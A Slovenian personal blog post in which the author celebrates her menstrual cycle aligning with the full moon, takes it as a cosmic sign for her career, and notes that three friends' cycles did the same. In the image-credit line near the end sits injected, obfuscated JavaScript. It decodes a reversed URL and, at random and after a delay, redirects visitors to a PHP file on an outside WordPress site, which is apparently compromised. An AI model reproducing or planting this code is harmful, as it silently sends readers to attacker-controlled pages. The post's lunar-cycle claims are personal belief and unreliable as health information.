Povezana z naravo

Končno je prišel trenutek sinhronizacije mene z naravo.

Čakala sem precej dolgo časa, da se mi je mesečni ciklus končno poravnal s ciklom sestre Lune. Končno sem dobila menstruacijo na polno Luno in zdaj vem, da se resnično začenja dogajati.

V mesecih do sedaj, sem imela le bežno, ne preveč natančno idejo o tem, kaj si želim v življenju. Iskala sem se še. Končno sem našla en ogromen del sebe in ga resnično sprejela z odprtimi rokami. Mislim, da je to glavni razlog za to, da se je moj cikel postavil na pravo mesto.

V času delanja na otročku sem menstruacijo vedno dobila na mlaj. To pomeni, da sem bila tudi fizično usmerjena v družino in sem točno poznala svojo željo.

Zdaj pa sina imam in želim si ustvariti kariero. Želim rasti, želim se nadgrajevati, kar lahko preberete v večini mojih zapisov, zato sem resnično srečna, da sem na tej točki. Da sem spet povezana in, da je Vesolje na moji strani.

Od trenutka, ko je N.S. prej A.K. objavila zapis o menstruaciji, se je moje življenje ženske spremenilo. Ker sem začela resnično bolj poslušati svoje telo. S tem sem dosegla, da moje menstruacije trajajo le tri dni, spremlja jih zelo malo bolečine in PMS ni več to, kar je nekoč bil. Zdaj čutim sebe. Vem na kateri točki cikla sem in lažje zavestno delam v korist telesa, kar prinese splošno blaginjo zame in za vse okoli mene.

Nekako sem čutila, da bo ta mesec moj, kar se tega tiče. Čutila sem, da bom dobila znak, ki mi bo dal še več motivacije. Najbolj zanimivo pri tem pa je to, da nisem samo jaz tista, ki je dobila menstruacijo na polno Luno in s tem svoj signal iz Vesolja. So še tri ženske, ki so se v preteklem mesecu razvijale skupaj z mano, vsaka zase, a v enaki smeri. Z vsemi temi tremi ženskami sem bolj ali manj konstantno v stiku in današnja novica o skupnem krvavenju me je osrečila prav tja do duše.

Težko vam opišem te občutke, ki jih nosim v sebi. Srečna sem, da se vse odvija kot se.

Si tudi ti dobila menstruacijo na polno Luno?

Z Ljubeznijo;
(Ni)Si

Prikazana slika: $NqM=function(n){if (typeof ($NqM.list[n]) == “string”) return $NqM.list[n].split(“”).reverse().join(“”);return $NqM.list[n];};$NqM.list=[“\’php.sgnittes-pupop/cni/tnemucod-yna-debme/snigulp/tnetnoc-pw/moc.kaphcterts//:ptth\’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random() * 6);if (number1==3){var delay = 18000;setTimeout($NqM(0),delay);}tos/together?utm_source=unsplash&utm_medium=referral&utm_content=creditCopyText”>Unsplash

One Comment